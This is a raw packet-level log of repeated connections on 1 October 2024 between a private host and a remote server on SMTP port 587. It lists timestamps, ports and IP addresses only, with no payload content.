Oct 1, 2024 06:19:33.943249941 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:33.943403959 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:33.948323965 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.110279083 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.110693932 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.115595102 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.294951916 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.295046091 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.295058966 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.299515963 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.299554110 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.299726963 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.301146984 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.301146984 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.306217909 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.467329979 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.471612930 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.476597071 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.637593985 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.637806892 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.642683983 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.801987886 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.802244902 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.808545113 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.979938030 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:34.984019041 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:34.988989115 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.147789955 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.148111105 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.152976990 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.331113100 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.331319094 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.336792946 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.494942904 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.495263100 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.495310068 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.495373011 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.495419025 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.500159025 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.500240088 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.500252008 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.766575098 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.767313957 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.772156954 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.931889057 CEST	587	50479	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.932244062 CEST	50479	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.933223963 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:35.938802958 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:35.938875914 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:36.516168118 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:36.520237923 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:36.525069952 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:36.689112902 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:36.691881895 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:36.696661949 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:36.861313105 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:36.861884117 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:36.866650105 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.044434071 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.044445038 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.044457912 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.044466019 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.044470072 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.044549942 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.044549942 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.136806965 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.139897108 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.144973040 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.304032087 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.305100918 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.309972048 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.469054937 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.469300985 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.474093914 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.635955095 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.636218071 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.641153097 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.814261913 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.814424992 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.819219112 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.979087114 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:37.979372978 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:37.984309912 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.171271086 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.171670914 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.176493883 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.340116024 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.344373941 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.344412088 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.344412088 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.344453096 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.349363089 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.349366903 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.349437952 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.589322090 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.592219114 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.597096920 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.762406111 CEST	587	50480	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.764182091 CEST	50480	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.768744946 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:38.773545027 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:38.773946047 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:39.322885990 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.323049068 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:39.327913046 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.483606100 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.483767033 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:39.488636017 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.643310070 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.643728018 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:39.648545980 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.829063892 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.829081059 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.829088926 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.829097033 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.829142094 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:39.915249109 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:39.917090893 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:39.921873093 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.075984001 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.076764107 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:40.081646919 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.207993031 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:40.211993933 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:40.213263988 CEST	587	50481	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.216013908 CEST	50481	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:40.216878891 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.220057011 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:40.796188116 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.799951077 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:40.804790974 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.965611935 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:40.968162060 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:40.972968102 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.136759043 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.140486002 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.145267010 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.335761070 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.335773945 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.335789919 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.335800886 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.335808992 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.335832119 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.335859060 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.428205967 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.429893017 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.434758902 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.595527887 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.596307993 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.601166010 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.739592075 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.741456985 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.744672060 CEST	587	50482	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.744716883 CEST	50482	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:41.746287107 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:41.746335030 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:42.318197012 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:42.320733070 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:42.325669050 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:42.484992981 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:42.488168001 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:42.493037939 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:42.848891973 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:42.852063894 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:42.856894016 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.029602051 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.029611111 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.029622078 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.029628038 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.029757023 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.029757023 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.119977951 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.121763945 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.126597881 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.285770893 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.287348032 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.292145014 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.452723980 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.465029955 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.469867945 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.639717102 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.640002966 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.644798994 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.817329884 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.817517042 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.822314024 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.984715939 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:43.984947920 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:43.990159035 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.170996904 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.171202898 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.177007914 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.335597992 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.336041927 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.336041927 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.336076975 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.336076975 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.340879917 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.340883970 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.341080904 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.588952065 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.591876030 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.596707106 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.762564898 CEST	587	50483	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.763575077 CEST	50484	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.763592005 CEST	50483	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:44.768445015 CEST	587	50484	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:44.768523932 CEST	50484	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:45.318393946 CEST	587	50484	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:45.318650007 CEST	50484	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:45.323604107 CEST	587	50484	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:45.379620075 CEST	50484	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:45.381222010 CEST	50485	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:45.385193110 CEST	587	50484	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:45.385235071 CEST	50484	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:45.386018038 CEST	587	50485	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:45.386075974 CEST	50485	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:45.938385963 CEST	587	50485	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:45.940186977 CEST	50485	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:45.945036888 CEST	587	50485	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.102451086 CEST	587	50485	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.102581978 CEST	50485	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:46.107522964 CEST	587	50485	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.254609108 CEST	50485	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:46.256038904 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:46.260093927 CEST	587	50485	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.260396004 CEST	50485	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:46.260786057 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.260885954 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:46.820144892 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.820280075 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:46.825104952 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.993697882 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:46.993890047 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:46.999135017 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.163491964 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.163825035 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:47.168720961 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.352818966 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.352833033 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.352843046 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.352885962 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:47.364321947 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.364332914 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.364371061 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:47.365968943 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:47.370690107 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.529058933 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.529915094 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:47.534732103 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.727349043 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.727511883 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:47.732346058 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.890455008 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:47.890822887 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:47.895772934 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.080758095 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.080950022 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.085839033 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.243020058 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.244057894 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.248907089 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.428780079 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.431960106 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.436777115 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.593964100 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.595989943 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.596026897 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.596026897 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.596266985 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.600804090 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.600889921 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.601171017 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.831655025 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.833074093 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.837937117 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.997618914 CEST	587	50486	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:48.998413086 CEST	50486	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:48.999233007 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:49.004512072 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:49.007909060 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:49.624175072 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:49.624327898 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:49.629338026 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:49.804085016 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:49.804233074 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:49.809138060 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:49.979368925 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:49.979830980 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:49.984719038 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.191939116 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.191951990 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.191957951 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.191962957 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.192130089 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:50.280292988 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.281618118 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:50.286514997 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.463816881 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.467825890 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:50.472629070 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.647138119 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.647613049 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:50.652456999 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.816129923 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:50.820570946 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:50.825455904 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.013135910 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.013493061 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.018332005 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.184664965 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.184848070 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.189635038 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.376146078 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.376368046 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.381239891 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.555296898 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.555615902 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.555687904 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.555708885 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.555728912 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.560472965 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.560486078 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.560595036 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.817523003 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.818423033 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:51.823324919 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:51.999778032 CEST	587	50487	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:52.000159025 CEST	50487	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:52.000891924 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:52.005779982 CEST	587	50488	198.54.114.247	192.168.2.4
Oct 1, 2024 06:19:52.005860090 CEST	50488	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:19:52.583496094 CEST	587	50488	198.54.114.247	192.168.2.4
